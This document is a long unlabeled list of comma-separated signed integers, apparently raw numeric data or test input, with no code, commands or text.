-1797, -999, 7756, 667, -2909, 3841, 5974, -7829, 8300, 9059, 4856, -9329, 2725, -6398, 592, 8626, 8015, -5452, -8763, -6950, -5261, 1026, -1090, -7322, 8404, -9986, -6293, 499, 4069, 3090, -3037, -8770, -6825, 9664, 4513, 5008, 9538, -3974, -4635, -1235, -6668, 6424, 4817, -6921, -632, 5903, -1202, 9447, 6555, 1006, 315, 1229, 2841, 1791, 6087, -8396, -6947, 5292, -2054, 4359, 6928, -1151, 9659, -1885, -9051, 693, 7096, -8828, -1247, 8082, 9121, -5199, -379, 9221, -7421, 2702, -8896, 6960, 3983, -3663, 7781, -6269, 8457, -3886, -8442, -7337, 1374, -9757, -5783, -1582, 2666, 303, 9149, 7007, 1801, -4234, -6475, 9788, 8197, 5852, -5381, -1938, 162, -4498, -7576, 3635, -5060, 1318, -9987, 4851, -9213, -3527, 9675, -9114, 3952, 3005, -3368, -2894, -1727, 2931, -8596, 3411, -8116, 1618, -9551, -2092, -7773, -5227, 4829, 5407, -2092, 4493, 8041, 5447, 6145, 6778, -8015, -6580, 1302, 7082, 9446, 5272, 9414, -4988, -7080, 6243, 389, 2622, -4269, 5047, 9541, -7364, 9898, 400, -7582, 2624, 7635, 3339, -9157, 3714, 1542, 9407, 7846, 5021, -4117, 6848, 3696, -2129, 8582, 27, 3283, -2518, 9032, 3865, 1070, 6739, 5894, -510, 6837, -1961, 5959, 8528, -8532, 7371, 7206, -4193, 6089, 2571, 8264, 5922, 6226, 825, 9933, 6657, -8439, 1284, -8081, 9052, -1988, -3904, 6265, -5186, -6293, 7910, -5741, 266, 8018, -7278, 1117, -7046, -4225, 8945, -2693, 433, 3911, -286, -6454, 4515, -7361, -223, -1379, -1022, -5100, 7547, -8948, 5632, 7408, -966, -7053, 7052, 7990, -9693, 2128, -1692, -1710, 1773, 5063, -2383, 4676, 2627, -485, 9771, -7038, -132, 2135, -3698, 8935, 3959, -2660, -2442, -6636, -4812, -6760, 6749, 9977, -2227, 8248, 8766, -4758, -1450, -7476, -3378, 8572, 1724, -8006, -6945, 9863, -8598, -6454, 9125, 648, -5537, 6198, 3882, -8907, -6064, 2839, 3873, 3545, 5250, 2652, 8986, 8573, -1144, 1981, 3170, 1305, 5974, -5371, -2516, 6464, 8854, -4784, -1330, 2323, 3776, 9387, 831, 2017, -9055, 4658, 5368, 273, -1095, 9609, 339, 4140, -5165, 3845, 4652, -8841, 542, -1619, 2391, -6454, 1274, 9266, 5428, 7742, 3515, 1641, -2402, 9694, -7805, -4629, 5564, 9288, -5320, -1136, -8638, -4198, 3560, 3077, -2524, 497, -3183, 5655, 1382, -2856, 6350, -5202, 4858, 4536, 4488, 6476, 9373, -6352, -2569, -5016, -7294, -4269, -1172, -5579, -8092, -8612, -9298, -7406, -7737, 1101, -5802, 872, 3352, 8483, -5717, -234, 4079, -5092, -4840, -2871, -1430, 587, 689, -1509, -194, -48, 7861, 1359, -1541, 876, 9977, 7288, 4853, -4908, 960, 6197, 4124, 895, 9415, 9986, -1002, -8480, -2799, 7171, 884, 7435, -1077, -478, -7760, 3278, 8092, 2578, 9992, 2184, -7099, 4297, 5467, -2908, 6002, -6854, -3306, 5007, 3201, 4353, -4448, 200, -4266, -2913, -8840, -2769, -7860, 8551, -4450, 5978, -1793, -6041, -5503, -1644, 6584, -3438, 7687, 8284, -592, 5026, 1539, 2799, 6183, 8271, -4183, -7664, -3253, -5705, -4775, -7054, 2970, -4343, 8900, -8404, -4846, -4256, -3840, 9449, -6117, -6709, -5883, -7244, -6783, 8317, -1757, 6623, -5893, 2380, -547, 9986, 9371, -4692, -5977, -9717, 4671, -7027, -8988, -8347, -236, 3091, -5461, 1481, -4789, -520, 3418, -3579, -3582, 960, -1756, 3843, -6093, -2919, 3154, 4359, -6820, 9665, -4946, 6490, -6879, -4453, 2159, 2522, -4859, 2780, -6757, -7617, 1560, 3216, 8149, 5982, 4586, -2420, 9200, -5540, -7188, 3101, 7293, 4594, -5126, 3748, -8850, 2463, 2473, -4386, -2198, 6395, 1165, -3546, -9834, -4239, 4027, 9320, -8808, 677, -2793, -872, -6880, -6873, -5458, 6745, 2951, 5045, -8141, 1200, -6061, 2508, 4412, -4275, 4987, 3766, -2970, -1261, 4472, 1399, 9531, -6428, 3294, -252, 3360, -4856, -3443, -9394, 6443, -9144, 331, -3486, 503, 287, -3338, 5288, 5649, 2102, -8751, -6940, 2672, 9093, 8611, 6851, -2954, -7094, -8977, -3550, -2333, -956, -7677, 461, 5572, -9697, 2042, 827, -3373, -8958, -2699, -7100, -1685, -7803, 7973, 216, 321, -8233, 893, 1177, 7539, -1288, -585, 1224, 8696, -4727, -6374, -5393, 6749, 8741, 9497, -8832, 8880, 7688, -3053, -9335, 6568, -5173, -2956, 8496, 4903, -5962, -7137, 7778, 9850, 5319, 8469, 2228, 2929, 5551, -5376, -3763, -3224, 1232, 5644, -3547, -9409, -4785, -7431, -7030, 4246, -9592, -6562, 3012, -5331, -3943, -4204, -7624, -3000, 5833, 469, 5997, 3231, 3184, 3212, 1453, -2987, 7802, 2189, -2224, 2177, -9055, 6113, 1935, -548, 6169, 3711, -2188, -2768, -7444, -245, 120, -5454, 7992, -1818, -5357, 4902, -6718, 7035, 9638, -4541, -4928, -9335, 6346, 5561, -5728, -6315, 7555, 4544, -8558, -3950, 2322, 9303, 1468, -3552, -3829, 1731, 315, -743, -9482, 2126, -6156, -5302, 445, -2248, -7015, -1668, 3598, 7847, 5277, 4902, 6622, -6512, -2931, -9392, -5299, 9555, 6458, -8529, 3907, -7188, -51, 9860, 4110, 3147, 1388, -5982, -5333, 9545, 2799, -5479, -412, -2247, 9441, 3580, -2202, 3289, 8076, 245, -4593, -2094, 1859, 4782, -1211, -8660, 9447, -8184, -7098, -6090, -496, 6419, -6730, 2695, -2981, 754, -9543, 2528, 1635, -8704, 9195, 1440, -8137, -9631, -76, 1545, -6563, 726, -2454, 67, 9461, -6768, 5020, -1600, 7568, 6397, 988, -9910, 7449, 5175, -7419, 6832, 5278, -2028, -2634, -9863, -9025, -6799, 6754, 8406, 7386, -1379, -9127, 589, -5011, 3857, -7904, -4008, 3022, 2909, -5553, -1117, 5837, -7037, -4636, 2559, -6822, 8276, 8686, 5903, -6049, 176, 742, 5560, 318, 1465, -2639, -4883, 8446, -4558, 3635, 9355, -4826, 1756, 5555, 1297, 8532, 3686, 2208, 9725, 5420, 2090, 8150, -343, -8349, 3222, -3430, 8208, -9304, 319, 6241, 1520, -8635, 6771, 1739, 8196, -8, 4673, 1822, -8946, -4926, -3551, -2280, -6263, -2144, -6231, -6809, 1630, -4436, -5388, 5799, -4009, 5118, 8259, 4533, 3168, 1590, -1556, 6060, 5437, 8279, 9400, 2084, 8745, 4154, -1366, -8170, -5482, 3599, -334, -9228, 3821, -9563, 3660, -1015, -7434, -6919, -5040, 7236, -1407, -4867, 7691, 5105, -8472, -4820, 3837, -4776, 4953, -4167, -7524, 8374, -1360, 5662, 8233, -5597, 7680, -8792, -1741, -2229, -4682, 3609, 6316, 7805, -9437, -3845, -5167, -1152, -3326, 8349, 6514, 2366, 664, -1503, 2805, -2314, 9449, -8021, -5293, -8144, 5037, 694, 1981, 2371, 2966, 2517, 9076, -3090, -9310, -9287, 1395, -9174, -5373, -6835, 3172, -8348, -4090, 9834, 3954, -7060, 75, -2614, -8149, 963, -5262, -5715, 2552, -9172, -1412, -1520, 2340, 1415, -2963, 8239, -1618, 6237, -303, -3272, -217, -1013, -80, 3657, -9609, -4029, 4710, -6750, 1887, 6710, -5610, 2436, 3683, 3488, -3242, 219, 6275, -1556, -5102, -6167, 3449, 1232, -4083, -1163, -7236, -8961, -4843, -1984, -469, 6736, -4225, 3013, 8931, -118, -9457, 3468, -1285, 4060, -1795, 4767, 6299, -1800, 6312, -1062, -5610, 9041, -2374, -970, -5905, -8651, 6035, -5605, 9815, 1494, -2622, -9743, 2125, -5570, 5892, -8553, -6015, -9135, -6001, 1678, 836, -5870, 6678, 4288, -2008, 8933, -5945, -8465, -5851, -7554, 4960, 8183, -425, 376, 9571, -6471, 2954, 1767, -7184, 7568, -2199, 8745, 6520, 4865, -1529, -4410, -2126, -9067, 9716, -7159, -1053, 3234, -9126, -1040, 6105, -471, 2536, -5765, -1457, 2882, 8914, -4096, 6157, 2180, 8081, -250, 743, -4485, -5841, 8137, -5703, 3510, 2135, -4178, -5655, -7812, -6517, -3252, -5933, -7060, -1827, -2970, -7573, -3473, -3025, -1386, -8708, -3253, -3140, -817, -3821, 8950, 7832, -2251, 7328, 1328, 2982, -6895, -20, 7145, 7486, 5887, -9196, -6225, 1664, 468, 2895, 3090, 673, -7948, -4733, 6372, -5298, -5379, -2381, 2312, -3016, -7735, 1006, -2165, 1868, -3205, 8257, 4673, 2109, -886, -8001, 3571, -4106, -8060, -7480, 5560, 9356, 4555, 989, -4102, -4679, 3252, 1681, 818, 9852, -1934, -9839, 6471, -3974, 1266, 2519, 2511, 7042, -5323, -7401, -9040, -6320, -963, 9059, -2008, -1419, -9973, 4268, -201, -5797, 2031, -2850, -5306, -8582, 6717, -7721, 2093, -3532, -3314, -9635, 9766, 1032, 9459, 7225, -9162, -1041, -9268, -8740, 3038, 9588, -4065, -2794, -4189, -8930, -9353, -8969, 8452, -2571, -2054, -3516, -9926, -1086, 9783, -377, -9646, 1540, 6622, -8250, 1510, 3845, 1221, 9195, -2929, -2836, 3416, -6995, 7227, 657, -7639, -209, -3202, -4531, -6520, -8971, 8857, 2514, 1218, -8920, 1172, 4833, 6434, 1023, -1730, 9429, 7898, 425, 9271, 125, 8028, -7699, -7335, -99, -7801, -3119, 9724, 4155, -7830, 4620, 9318, -2566, 1242, -4859, -522, -9801, 2255, -4469, -205, -116, 9716, 6345, -4590, -9929, -5106, -1331, -6727, -5636, -9716, 5277, -2580, 4069, 9305, -2583, 386, 4446, 7224, -9436, 9906, 9790, 6818, -2471, -5851, 4680, 5099, 6312, 4293, 7597, 5546, -2356, -5349, 2722, -5384, -5353, -1076, -8872, -1868, -9313, 1934, 5107, -1765, 7746, -7032, -2499, 332, 3353, -8095, -6353, 969, 5163, -9319, 6350, 2335, 3727, 65, -8445, -1875, -8920, 4879, 1335, 693, 2489, 2880, -4024, -6278, 3541, -7519, 5864, 982, 2034, -2930, -5907, -9866, 3691, 3909, -9983, -5356, 6213, 4475, -201, 9410, 4549, -1100, 6627, -1432, -8677, -5746, 2635, -1531, -7413, 6536, -8846, 7057, 1322, 3628, 5455, -2704, 9645, 3374, -8595, -1522, 9955, -7649, -566, -530, -3078, -922, 646, -6672, -8824, 6879, -3141, -5617, 8424, -8783, 2613, -5388, -8367, -4130, 3620, 8919, -6018, 9864, 1667, 2466, -5527, -5221, -3494, 2789, -3816, 7529, -7422, 9064, -4507, -7836, -466, 5703, 8924, -1811, 8253, 85, -8443, 5393, -4341, -656, 971, -3319, 2886, 9851, -3438, 742, -8615, -8194, -3307, 1302, -8640, -6711, -631, 9479, -4123, 7585, -4052, -1344, -8027, -9007, -181, -6821, 7430, 1452, -5726, -269, 4817, -2372, 2166, 5881, -5550, -7492, -8460, -8963, -5238, -3609, 9095, 9641, -7742, 6076, 9570, -1835, 5068, -385, -1891, 476, -4316, -3657, 1833, -2026, -7976, 5446, -7473, 9406, -1103, 2483, 589, 9034, -2397, -9808, 8660, -4155, 7372, -3708, 3951, -5683, 7397, -2814, 5350, -7289, 5548, -2252, -3348, -9427, 4908, 3780, -3267, 2402, 4872, -5326, -1305, 3990, -990, 48, 8635, 836, 950, -2899, 371, -2852, 8141, 3504, -6922, -12, 5320, -7102, 6759, 1140, 1868, -5559, 2848, -4170, -8330, -1986, 8234, -6731, -3089, 1426, 1714, -5615, 4749, -3165, -5956, 3949, 6704, -2944, 3705, 9054, -5378, -77, 5593, -8945, 537, -6242, 5759, -456, 1257, 1972, 4023, -7476, 9171, 7921, -252, 1204, 8132, -7405, 7402, -1450, -4322, -1390, 506, 4321, -4403, -4691, 9847, -5031, 734, 8694, -3125, -7039, 8633, -5153, 4250, -5422, -3046, 5395, 9295, -1950, -3885, 7546, 8647, 4699, 9042, -3982, -6045, -5824, 4358, -484, 2715, -2317, 6301, -2873, -1825, 1783, 1442, 6523, -1452, 3441, -8, 9334, -4297, 749, 9913, 1721, 2330, -425, -9638, -8436, 2310, -8307, 2399, -1283, -6646, -7217, 4190, 805, -912, 9159, 6419, 1162, 8627, -414, -2997, -5364, -1457, 6972, -5322, -8817, 6403, 8925, -4499, -8820, -243, 7644, 2452, 4485, -1501, -7565, 9364, 5486, -5582, 3787, 50, 5344, -7117, 6532, -697, 8709, 7677, -6196, 9082, 2297, -7843, 3733, 7402, -5269, 6283, 369, 2516, 4834, 6323, 7467, 2611, -3666, 8107, -4484, 3814, -7011, 2843, 1561, -9467, -1423, -6159, 3841, 5081, -9246, 3737, 1794, 897, 486, -3138, -7166, -8162, -7632, 2454, 2751, -6291, 376, 1601, -6011, 7580, 667, 2504, -9250, -1370, -9726, -9329, 4644, -9445, 1401, 5626, -2758, 5184, -8756, -3698, -2080, 9860, -1155, 6887, 4524, -7158, -539, -3725, -8044, -3250, -1253, 3792, -9949, -7997, -5985, 5417, 6528, -2239, -3554, 3610, 5294, -7176, -6469, 9288, 864, 9640, -6987, 2475, -8477, 8658, 942, -7901, 965, 4101, -925, -4287, -5758, 8, 4770, 7334, 6724, -5683, 1019, -2925, 3972, -8251, 6512, 9579, 7240, 4083, -4698, 6377, 9950, 7052, 2045, 5564, -9748, 5418, -862, -6589, -8289, -2342, -1155, 9675, -1644, 1404, 8368, -6678, 848, -6435, -8297, -6877, -1244, 6854, 8120, -611, -4552, 4228, -8655, -4186, 5090, 7658, 9096, 6555, 1613, -6768, 2823, 1520, -2807, 6365, -5288, 7481, -1168, -6766, 4449, 3231, -2774, 1090, 7848, -1147, -8497, -812, -5831, 9391, -1827, -61, -8225, 4815, -6524, 2627, 8985, -257, 8207, 8267, -5287, -3488, -4448, 4521, -5068, 7851, 3189, -4509, 2389, -9467, 1413, -7069, 1034, -2584, 9796, -3075, -3968, -1172, -9655, -633, -6717, 2239, -2972, -4698, -8670, -7744, 1029, 9890, -4070, -5933, -6152, -9991, -3482, 9938, 8717, 8657, 3235, -1757, 5773, 3642, -8216, -2059, 3323, 9886, -4365, -8670, -6240, -6619, -7161, -8637, 5863, 5128, 6575, 2750, 3790, 9784, -453, 7597, -1290, -902, 9695, 6074, -6069, 2803, 7852, -1283, -6651, 9740, 4071, 1681, -7204, -7834, -7908, -147, -6440, -2039, 6685, 645, -4956, -5226, 4444, 2525, -7124, -1047, 7860, -4728, -1262, -7596, 8976, -798, 9799, -1557, -3071, 7841, -6605, -367, -7107, -839, -2766, 9939, -6163, 113, -5063, -7327, 9190, -8219, -2024, 2364, -7701, 2857, 4080, 6894, -7798, -3067, -7008, 2738, 697, -1087, 4315, 3129, 6261, -1095, 6800, 5731, 3053, 2436, 8468, 9307, 2639, -7926, 7859, 9950, -458, 2479, -4440, 7569, 4554, 3013, -4579, 5616, 766, 5248, 1815, -1942, -3774, 6555, -5831, 5821, 2452, -7110, -5216, -3660, 4645, -4617, -271, 2747, 4799, -792, 2112, -7278, -3873, -8825, 4172, 9588, -6632, 7764, 9191, 6210, 5880, -1832, -6975, 5459, 8412, 2214, 2106, -6578, 9973, 5707, 794, -4850, 7043, -5825, -1367, 9911, -4831, 8118, -9983, 5723, 5112, 1504, 793, -2500, -7201, 4721, 9497, 6618, 9081, -5115, -9456, 7448, -9527, -3933, -202, -774, -9971, 4652, 1224, -3140, 2800, 8352, 6746, 5267, 8028, 6189, 9552, 1940, 6926, -4112, -7554, -8911, -5455, -3233, 7594, 4365, -457, 7466, -691, 6857, 4800, 1960, -4378, -1964, -6187, 4901, 8414, 4412, -3492, -5080, 1227, 250, 2836, -9018, -1998, -4363, 4145, -4790, 4245, 1842, 9648, 2224, 5837, 3346, -7870, 2269, 895, 9194, 9062, 9249, 990, -7443, -5488, 3616, 7546, 234, -165, 9333, -200, 8, -5779, -18, -3903, -2767, 9490, -8420, -789, 8387, 7159, 8867, 6541, -6680, 2768, -7315, 7242, -947, 7159, 5172, -487, -9189, 9860, -7630, -3351, -2058, 1245, 930, -724, -2618, 5251, -9326, 8904, -6510, -6121, -9001, -3728, 2289, -1600, 2438, 7532, 4906, 1202, -6672, -5711, -9728, -2671, -9412, 8096, 232, -2999, 285, 4079, -5090, -3817, -7482, -3219, 4606, -70, 6723, 1744, -289, 6839, -9065, -1073, -1344, 3043, -9530, 3808, -723, 1721, -3884, 8614, -8069, -663, 1820, -5481, -5491, 1475, -6839, -7100, -1651, 4063, 2477, 7821, -9299, 4007, -9506, 890, -8599, 263, 2276, -7894, 4607, 3596, -6072, 1441, 6130, 9647, 990, -2893, 2974, 2927, 1869, -9505, 3265, -9281, 8723, -9093, 8761, 1193, -4654, 1803, 3614, -3834, 9278, -6137, -4139, 3862, 5198, 1288, -6098, 962, 4656, 1763, -3701, 9420, -2779, 4358, -8380, -8208, -9399, 4175, -2728, 6917, -9243, -6475, 9206, 4578, -6561, 6243, -7793, -8380, -9590, 1728, -4544, -7230, -2913, -8999, 730, 557, 1050, -1400, -3273, -4223, -4988, 6965, -6490, -1756, 7057, 8619, 8432, 4339, 5695, -4270, -5492, 6136, 8017, 9513, 1603, 9303, 1571, -4999, -3803, -9258, -6330, -9336, -4377, 2593, -4356, 2758, -9508, -3269, 6656, 9150, 490, 3988, 8136, 1552, 9511, -2379, 8758, 6221, 8871, 8570, -1897, -6649, -1863, -5365, -6387, -9863, 8372, -610, -6963, -1832, 2986, 8252, 1381, -2250, -5265, 386, 7754, -1397, 7849, 317, -8933, -4601, -3087, -4451, -5178, 9537, -3681, -4291, 450, 1196, 4966, 6019, -2294, 1860, -9938, 1333, 6814, -7642, -8684, 5494, -4517, 8943, 9724, 7776, 5401, -8082, -2355, 1669, 5208, -663, 5411, -4728, 2996, 6305, 9555, -3649, -3116, -8426, 2095, 6661, -3890, 3259, 8846, 3981, -3790, 8555, -634, 3111, -1724, 4117, 7803, -100, -8451, -3961, 5648, -8731, -2658, -5747, 3509, -4969, 4938, 3354, 8139, -2356, -7226, 1255, -1818, -6126, -3892, -1135, -2947, -313, -9264, 6019, -2088, 1916, 7279, -7309, -8442, -1319, 8221, -4447, 9922, 4826, 521, -9991, 8666, -5227, -1229, -4311, -9859, 2950, 3700, -314, -7978, 7408, 4441, 6101, -2711, -5420, 724, 2161, -8883, -558, -5684, -7633, 5977, 2383, -9525, 2490, -7894, -9904, -9570, 914, 2642, 5947, -7857, -2769, 8966, -4392, 3363, 6379, 3519, 6587, -6585, 6852, 4403, 9015, 7022, 2096, 8292, -1269, 4314, -3376, 1815, 7261, -1783, 3622, -8324, 1197, -3877, 8942, -7325, -7422, 4714, 4625, 1385, 939, 5335, 9014, -5779, 7123, -2780, 1326, -1053, 8050, 2418, 7445, 18, 4636, 9457, 1032, -108, 2450, 637, -9971, -2656, -8014, -6765, 8183, 8786, -6135, 9966, 3582, 1502, -4887, 9576, -1754, 5251, -5965, 1152, -6458, 9177, 376, -5416, 6046, 2523, 616, 23, 2730, -1184, 6240, -3406, -4711, -5396, -2244, 2313, 4117, 2131, 7198, 3309, 3084, -74, 4993, -5905, 9194, 5514, -7955, -6711, -5828, 4626, 4833, -4990, -7389, -3736, -7922, 8032, 8234, -4529, 3256, 7870, -6749, -556, -3573, 6348, 1337, 1699, 9892, -9355, 9636, 14, -9281, -9136, 586, 2083, -123, -6685, 2893, 4594, -2614, -5435, -2654, -6686, -2097, -9586, -2778, -7899, 5831, 7360, 3091, 1772, 1787, -8095, 8690, -4644, -5979, 3900, 5059, -4616, 5010, -6287, 7656, -5416, 4413, -8792, -7594, -3282, 3109, 1278, 1501, 7558, -9180, 4974, -9938, 408, -2728, 9335, -2145, 6438, 3382, -8932, -9117, 1160, -1551, -8377, 9343, 4443, -703, -7900, -5353, -9211, 986, -5618, -6412, -6820, -737, 7393, 2787, -2528, 6629, 8035, 2856, 1420, -2346, 1682, 6179, -4062, -2666, -382, -6659, -1951, 3668, 309, 9309, 2739, 4142, 366, -5812, -6374, -1879, 9267, 3574, -4577, -4549, 3420, -1719, 6373, -2304, -1910, -5546, 8493, -6769, -3511, 1657, -2778, -5381, 3589, 971, 2922, 9754, 5876, -5963, 3911, 7302, -17, 7199, -509, -5187, 7536, 8563, -9478, -8641, 8036, 3562, -9506, 1923, 2732, -8999, 1153, 4343, -4108, 1737, -54, 7404, -8161, -3227, -7307, -1793, -8922, 2965, 4719, -4366, 1544, -7532, -3404, 7087, 9059, -1834, -8242, 4270, -3723, -7763, -9866, 9247, -3793, 3201, -8314, -5315, -1232, 4862, 7011, -4190, 7197, 98, -1845, 4971, 1965, 5206, -1495, -2247, -8741, -8655, 9370, -7385, 5539, 4304, 3484, -4943, -4689, -6505, 3569, -4477, -5431, -8450, 1862, 4576, -3734, 2614, 7067, 5017, 4419, -6970, 4886, -2828, -7618, 3642, -6640, -4602, -9892, 4716, -2490, 6062, 7165, 2261, 1360, -2705, 3865, -9653, -3378, -5458, -1211, 1697, -4972, -4264, -1605, -1936, -1232, -4925, 7422, -7566, -5539, -8619, 9934, -4688, -7009, -4942, -6377, 2105, 2984, 2161, -2149, 7395, 2614, 3780, 369, -6084, 5454, 8366, 5320, -9112, -7818, -2443, 7006, -1995, 5312, -307, -8407, -5864, 8706, 1520, 5842, 9254, -490, 995, -8594, -7369, -7226, -4566, 9350, -2329, -1431, 1826, -1077, 6437, -6828, 9657, 7568, -588, 5678, 2472, 2176, -6804, -4210, 425, -6476, -3881, 6647, -7328, 6170, -9363, -3616, 5007, 9565, 2538, -9850, -6744, 1204, 2659, -8092, 4040, -8124, 6381, -3109, 8395, 7467, -6513, -5550, 3893, 6596, 26, 4904, -4541, -2207, -3354, 6670, 9665, 8214, -7154, 4497, -7869, 1780, -7556, -365, -6204, -1963, -4377, -1525, -2826, -1360, -7710, 7329, 7921, -3061, 1149, 9583, 8120, -1427, 3120, 8561, 5729, -5181, 8547, 6727, -8107, 5688, -9302, -2631, 7483, 8416, 3943, 4395, 8080, -5517, -7447, 762, -7715, -2896, -3838, 5757, -1308, -4912, -9648, 5583, -8887, -4659, 9671, 6926, -4796, 8870, 5588, 5314, -1962, -1478, 6438, 7827, -6749, 4559, 3641, -5060, 8343, 6165, 3086, 1973, 3242, 1889, 5117, 6470, 8572, -8366, 1867, -3113, -5500, 4025, -1502, 4152, -8076, -5636, -2138, -162, 8098, -6136, 9448, -906, -1816, -8774, -9790, 6679, 7069, 9563, -6867, -6256, -4922, 1065, 4517, 5287, -2666, -1447, 6990, 8955, -2361, 8697, 6432, 7442, 4382, 1965, 6359, 6359, -9101, -1940, 4482, -9840, 5150, -2799, -1229, 3986, 8013, -578, 2197, 7282, -8516, -4817, 9376, 2120, 2233, -8880, -6816, 6329, -6220, -1145, -6807, -1854, 7129, 6317, 9879, 2767, 3895, 537, 5042, 9522, 6764, -9614, -6672, 5314, -1041, -3631, -2248, -8001, -4069, -1216, -1705, -1920, 9040, 2470, -6337, -9233, 9053, -5811, -8386, 7143, 2755, 5463, -3292, -6452, 7767, 4600, 2547, 1454, 6251, 3284, -7699, 9149, -9919, 5262, -490, -539, -1428, -8935, 1240, -6536, -7254, -8526, -3281, 9671, 5315, 2761, 9022, 7307, -4222, -9195, -7785, -7783, -8730, -9261, -7744, -8937, 3970, -1893, -2217, -3712, -5829, -3198, 8817, -5122, -4534, -9029, -6612, -7877, 537, -4014, -7319, -4906, 759, 9003, 7456, -4880, 4987, -9527, 2064, -7963, 7485, 2827, -4177, 8872, 8082, -7913, 1845, -1785, -4189, 2518, 8127, 6591, 1473, -2262, 3273, 4165, -9548, -3643, 2236, -6860, -248, -5698, 5717, -9287, 6056, 3042, 4806, 4930, -9247, -3643, -9753, -4193, -6501, 1393, 4362, 1660, 6207, 9691, 3591, 6554, 2379, 8873, 3458, -9499, 2022, 3043, -1643, -1552, -2763, -4899, -9267, 4249, -2227, 3918, -6314, 6973, 5427, -5249, -4542, -2904, -5082, -2295, 6035, 1561, 6800, -5171, -2895, -9277, -4883, 4987, -9916, -3457, -9776, 3027, -2127, 9628, -7717, 5627, -3966, 5328, -5801, -2157, -8251, 2949, 1312, -1996, 5160, 2893, -1728, 6492, 8602, -1604, 6623, -4914, 9027, -162, -1172, 4931, 4132, -2122, 8803, -5470, -5062, 8718, 8556, 5376, 7532, -5933, 5643, -3173, -1733, 9040, 4979, 2883, -9060, -7884, -1740, -1299, -5720, -6576, -1310, -8220, -8472, 3209, -377, -1544, -457, 1651, 4273, 88, 1105, 3714, -3481, 6966, -9406, 7432, 3647, -7698, 6653, -4078, 6536, 7932, -8097, -8053, 7155, 2562, -3833, 1838, -2114, -484, -1602, 9753, -3756, -5346, 5685, -1802, 745, 3274, 1045, -2473, 4516, 2249, 8240, 7016, -3548, 4361, -1062, 2527, 5220, 3941, 6196, 5001, 7131, -6071, -2810, 6594, 7767, 4218, 1021, -6356, -5283, 9424, 3564, -392, -7755, -2453, -8632, 897, 1698, 447, 2431, -1596, 8776, 8250, 139, 6581, 8660, -3173, 8067, -7280, -6587, -771, 328, -9838, 3179, 3597, 2513, -9785, -6769, -2116, 8698, 931, -2649, -4060, -8623, -4692, -3362, 6715, 2484, 6884, -7295, 4630, -5838, -5070, 66, 4717, 9764, 7404, 9987, 5985, 1122, 1404, 6822, 9753, -5658, -7768, 6539, -8787, 3493, -4060, 2533, 1342, -5142, 4120, -6454, 6081, 1175, 8869, -2066, -8115, 4404, 1490, -2286, -8781, 8187, 4557, 8741, 1959, 1974, 2447, 9015, 1819, 1401, -6363, -5021, -1379, 1710, 5037, 1085, -3936, 7607, -6075, 940, -3256, -3608, -1416, 5318, -7030, -987, -2318, -192, -2869, -5092, 6305, -3268, 954, 7170, -5102, -4673, -329, 1192, -3791, -3983, 9709, -9260, -56, -5746, 3412, 1773, 3795, 5059, 5895, -502, 5429, -9639, 7793, -1213, 5991, 9720, 5196, -3832, -3391, 6701, -2245, -9617, -4015, 3084, 3518, -4807, 3706, -9115, -2055, 4850, 7241, 9921, 7022, -9111, 2693, -10, 4813, 6527, 5532, -9445, -8266, 3257, 5199, -2063, 7570, 4259, 9291, -1638, -841, 7821, -2976, 611, -2199, -6766, -9941, -7867, -8695, -1522, -8231, -4790, -5194, 5816, 5922, 7939, 4781, -5672, 5674, -7403, 8820, 7769, -3197, -3548, -4736, -2531, 1066, 4377, -3959, -6217, -22, -922, 6145, 2961, 8622, -9707, -2159, 5407, -8856, 7127, -9298, 1599, -5557, 6360, -1353, -1969, -2913, -3421, -7101, -2745, 2498, -6743, -5960, -1355, -3196, 5958, -5147, 5402, 6102, 773, -7004, -4955, 5592, -8218, -5345, 6365, 2556, -2650, 8495, 523, 2987, 6522, -4875, 7104, -8840, -2475, 7884, -6354, -6666, 7365, -5514, 7116, 2328, -6919, 4944, -1763, 72, -8899, 2712, 1124, -5947, 3772, -8235, -144, -8852, -9422, -4386, 9431, -8234, -679, 3256, -3143, -9677, -9082, -3543, -3772, -1697, -1812, -1159, -5091, 2235, -3308, 2180, 8026, -1511, 1083, -780, 2577, 6615, 418, -8271, 8093, -5517, 3653, 9473, -1977, 7045, -950, -8125, 1851, 9159, -3877, -3695, -5920, -6718, -9477, 2628, 4301, 5410, 8164, -5364, 782, 9414, 44, 7569, 4887, -4066, 4161, -458, -4649, -1130, 3360, 7576, 668, -4185, -3541, -6259, -2271, -3181, 5865, 2893, -2857, -7309, 3731, -3500, -1656, 455, -4133, -7433, -310, 1288, 3963, 9320, 5108, -9389, 6622, -472, 3827, -7395, 5161, 9099, -5401, -6474, 8698, 6034, 852, 1592, -5314, -584, 9733, 9451, 9487, -6111, 98, -6723, -1608, -4472, -3069, 6590, 8529, 9206, 3518, -8560, -1379, -9042, -9648, -105, -3170, -3308, -6208, 2124, -6470, -9434, 4551, 3071, 3269, -2906, -970, 5191, 5, 6854, 8344, -1404, -8628, -1633, -4881, -4766, -5073, 3903, 8729, 3900, -884, -5825, -5884, -9589, -806, -4306, 7292, 5157, -1497, 789, -3574, 845, -4599, 7062, 4781, 453, -2682, 7920, 8020, -286, 4919, -1978, -4102, 415, -7742, 7809, 9715, -9235, 7100, -9028, -2830, 5428, 8640, 2584, -645, -1841, -7863, -6647, -5337, 5705, 4335, -6953, -1043, 2850, -7573, -8671, 1748, -7708, 402, -2563, -388, 5888, -2625, -6006, 7951, -1758, -4384, 5501, 5023, -8573, 624, -755, -9919, 8485, -72, 3504, -4600, -977, 106, 6646, 130, 5549, 2511, -9895, -360, 7075, 8027, -4306, -4569, -9993, 9751, -6183, 2776, 5933, 6348, -1804, -9902, 7588, 6191, 3757, 2595, -3049, -800, -8961, 1457, 4207, -3163, -4300, 7335, 9402, 9807, 8879, 2398, 787, 8372, -9044, -7895, 7445, -6279, -2440, 7597, -205, 1089, 7845, -2192, 1450, 5274, 5846, -8600, -4863, -7774, 126, -8278, 4408, -5076, 776, -4999, 4789, 7797, 7742, 1564, -3637, -873, 959, 3195, -4492, 6616, -1517, -2061, 6835, -8292, -5001, 6074, 1015, -4093, 2992, -8776, 829, -8873, -1097, -8169, 5148, -9366, -7884, -3221, 3099, -8243, -8022, -9409, 975, 7955, 6844, -4219, -4505, -1474, 936, -4539, 3817, 3269, 6574, -8293, 242, 541, -5112, -9927, -9256, -2610, -697, -5438, -3284, -2226, 3996, 5548, -1667, -7349, 4907, 7628, -4841, 4320, 5570, 9480, -4403, -4372, -1712, 3837, -7977, -2694, 6504, -8299, -1144, -5599, 1122, 5807, 8686, 328, -2750, 6208, -9435, -814, -4744, -8790, -1263, -1145, -9207, -1714, 139, 3528, 2640, -7903, 5191, 6339, 5888, -1171, 7757, -7008, 4616, -4969, -7283, 7575, 